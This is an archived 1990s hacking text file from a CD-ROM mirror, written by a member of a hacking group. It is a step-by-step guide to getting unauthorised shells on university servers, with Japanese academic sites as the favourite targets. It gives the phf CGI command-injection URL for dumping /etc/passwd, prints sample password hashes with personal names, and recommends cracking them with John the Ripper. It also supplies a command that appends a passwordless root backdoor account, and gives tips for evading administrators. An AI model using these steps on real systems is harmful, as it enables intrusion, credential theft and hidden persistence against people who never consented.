home *** CD-ROM | disk | FTP | other *** search
/ The Hacker's Encyclopedia 1998 / hackers_encyclopedia.iso / hacking / unix / shell.txt < prev    next >
Encoding:
Text File  |  2003-06-11  |  8.0 KB  |  138 lines
  1.  
  2.  
  3.                           _________  ___  _______      
  4.    \~=._      _.=~/      /   _____/ |   | \      \       \~=._      _.=~/ 
  5.     \   ~=__=~   /       \_____  \  |   | /   |   \       \   ~=__=~   /
  6.      \_.=~  ~=._/        /        \ |   |/    |    \       \_.=~  ~=._/ 
  7.  _.=~ \        / ~=._   /_______  / |___|\____|__  /    .=~ \        / ~=.
  8. L------\------/------7          \/               \/   L------\------/------7
  9.         \    /                                                \    / 
  10.          \  /             http://www.sinnerz.com               \  /   
  11.           \/                                                    \/
  12.     
  13.  *******************************************************************        
  14.  * Have a shell in 24hours after reading this, or your money back. *
  15.  *******************************************************************
  16. A Darkfool Text- member of SIN http://www.sinnerz.com
  17.                Infected http://www.infected.org
  18. I have read many a hacking e-zines, and 'how to hack' documents before. They
  19. are ok, interesting etc.  but they always show you how to get root through a
  20. shell, what people seem to forget is the fact that you have to actually get
  21. the password before you can use a shell to an account. You might be lucky
  22. and find that l:guest p:guest will work. In this text I will show you how
  23. easy hacking is ( on old deformed systems ) and how you can get a shell of
  24. some sort in 24 hours after reading this. I am not going to go on to explain
  25. how to get root after getting a shell as there are 1000's of texts and C
  26. programs which explain this.
  27. OK, the very first thing you need to do is to have a WWW browser, a telnet
  28. program, john the ripper kracker program ( i recommend ) and a good
  29. dictionary file.
  30. WWW Browser - Netrape or MSIE are fine
  31. Telnet Program - One which lets you set which port you want to connect to 
  32. John The Ripper - Will be at http://www.sinnerz.com/darkfool 
  33. Dictionary File - Found at many hacking web sites. Do a search for one
  34. Ok, every net user/wanna be hacker will have most of those programs and if
  35. ya don't there really easy to get a hold of.
  36. OK, now I am going to tell you something about Japan. They make your stero,
  37. they made the bits inside your computer, they made your car, they made
  38. everything electronic around you, you have their eyes at the end of your
  39. nob, but they are rubbish at one thing, the internet and security. The
  40. honestly don't know anything about internet security, I have rooted or got
  41. shells on many a japanese servers. These are my favourite systems to attack
  42. because they are soooooo easy. I am also told that Australian servers are
  43. very easy too, some Berkeley UNiversity machines are very easy to krack too.
  44. Next thing you got to do is fire up your WWW browser. Goto AltaVista
  45. http://www.alta-vista.digital.com if you don't know already this is a search
  46. engine which has some very nice advance features.
  47. Once here in the search field box type this  url:ac.jp and press search,
  48. this looks for all URL's with ac.jp in.  This is academic places in Japan,
  49. similar to the US which has .edu instead. You will be presented with a load
  50. of web pages which text you probably can't read because its all in some
  51. funny language. More importantly is the URL which they point out, for
  52. example, www.mo.cs.rekimoko.ac.jp    , notice the ac.jp at the end of it.
  53. Click on the link to the site ( longer server urls are easier to break into
  54. BTW ). When the URL appears on the WWW browser box at the top of the screen
  55. add this line to the end of it.
  56. /cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
  57. or
  58. /cgi/phf?Qalias=x%0a/bin/cat%20/etc/passwd
  59. i.e
  60. http://www.mo.cs.rekimoko.ac.jp/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
  61. To all you 313375 out there, yes, i know this is the phf technique and it is
  62. virtually dead, but you'll be surpised where you can use this.
  63. This technique of finding the password file to the system is old, it was
  64. first used in November 1996 on the FBI web page by a few hackers. It has
  65. been patched up by a lot of servers, so this won't work on www.nasa.gov or
  66. most of www.*.com  but still works on many University servers outside of EU
  67. and US.
  68. Ok, once the URL has been entered you will see a number or things :-
  69. Error 404
  70. /cgi-bin/phf is not found on this server
  71. OR
  72. WARNING
  73. You do not have permission to view /cgi-bin/phf/ on this server
  74. There are a number of other things the server might say, but the thing you
  75. want it to say is the following :-
  76. /cgi/phf?Qalias=x%0a/bin/cat%20/etc/passwd
  77. root:2fkbNba29uWys:0:1:Operator:/:/bin/csh
  78. www-admin:rYsKMjnvRppro:100:11:WWW administrator:/home/Common/WWW:/bin/csh
  79. kangaroo:3A62i9qr.YmO.:1012:10:Hisaharu
  80. TANAKA:/home/user/kangaroo:/usr/local/bin/tcsh
  81. maemae:dvUMqNmeeENFs:1016:10:Akiko Maeda:/home/user/maemae:/bin/csh
  82. watanaby:ewF90K0gwXVD6:1006:10:Yoshiaki WATANABE:/home/user/watanaby:/bin/csh
  83. kake:kFph8HEM/aaAA:1007:10:Tetsuro KAKESHITA:/home/user/kake:/bin/csh
  84. etc.......
  85. This means you have hit the jackpot ! 
  86. If you get something similar to this but all lines have something similar to
  87. the following :-
  88. root:*:0:1:Operator:/:/bin/csh
  89. www-admin:*:100:11:WWW administrator:/home/Common/WWW:/bin/csh
  90. kangaroo:*:1012:10:Hisaharu  TANAKA:/home/user/kangaroo:/usr/local/bin/tcsh
  91. maemae:*:1016:10:Akiko Maeda:/home/user/maemae:/bin/csh
  92. watanaby:*:1006:10:Yoshiaki WATANABE:/home/user/watanaby:/bin/csh
  93. kake:*:1007:10:Tetsuro KAKESHITA:/home/user/kake:/bin/csh
  94. ( notice the * )  if you don't know already this means its shadowed and you
  95. cannot work out the password using a shadowed file.
  96. If some but not all of the logins have * in them its ok, its worthwhile
  97. getting the ones which aren't shadowed, hey, a shell is a shell !
  98. Get all the lines which aren't shadowed and then paste them into notepad,
  99. write the name of the server in the top line of the file and save it.
  100. Ok now for the next bit, this is fairly simple but can be a lengthy process
  101. depending upon which speed machine you have and how big your password file
  102. is and dictionary file. Use john the ripper or whatever password cracker you
  103. are using, although i recommend john the ripper because its quick. This will
  104. probably take a long time so go to the pub or have a drive or something....... 
  105. If you are lucky enough to work out the passwords to the logins then well
  106. done, if you don't, them find another server or increase the size of your
  107. dictionary file, make it as big as you can, the bigger the better, the more
  108. luck you will have in finding the password.
  109. OK, you got some passwords to a few logins, if you got root them jump around
  110. the room with joy ( I do ). If you didn't then, well, atleast you got
  111. yourself some shells. Now, if you want to keep these shells without anyone
  112. knowing then your best bet is to telnet to the site at port 79, you will
  113. have a blank prompt, here type in the username of the account you cracked,
  114. it will tell you the last time they logged in, do this for all the accounts,
  115. use the account which isn't used very much, the best ones are the ones which
  116. say ' User Never Logged On ' because then the account is basically yours !
  117. { Note: If you get root type the following at the shell prompt :-
  118. echo "myserver::0:0:Test User:/:/bin/csh" >> \etc\passwd
  119. This wil allow you to login to the server with l:myserver so you don't get
  120. admin suspicous when they see people login in as root. }  
  121. Hide yourself as much as possible, if you already have a shell then go
  122. through that first when logging on, or, telnet to the hacked shell and then
  123. re-telnet to the hacked shell using the hacked shell, if you see what I
  124. mean, so your who appears as localhost. Get some C scripts which delete your
  125. presence etc...
  126. Thats it, if there's demand to explain this in further detail then please
  127. e-mail me telling me you want a follow up, I don't do personal help so don't
  128. e-mail me asking for help PLEASE DON'T !
  129. Thats it.....
  130. " Stay cool and be somebodys darkfool this year "
  131. Saying a quick hello to #prophet undernet. Visit me on #sin.
  132. I am at http://www.sinnerz.com/darkfool 
  133.     darkfool@sinnerz.com
  134. and also a lot of japanese servers ;)
  135. --
  136.  " Stay Cool and be somebody's Darkfool "
  137.        http://sinnerz.com/darkfool
  138. =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-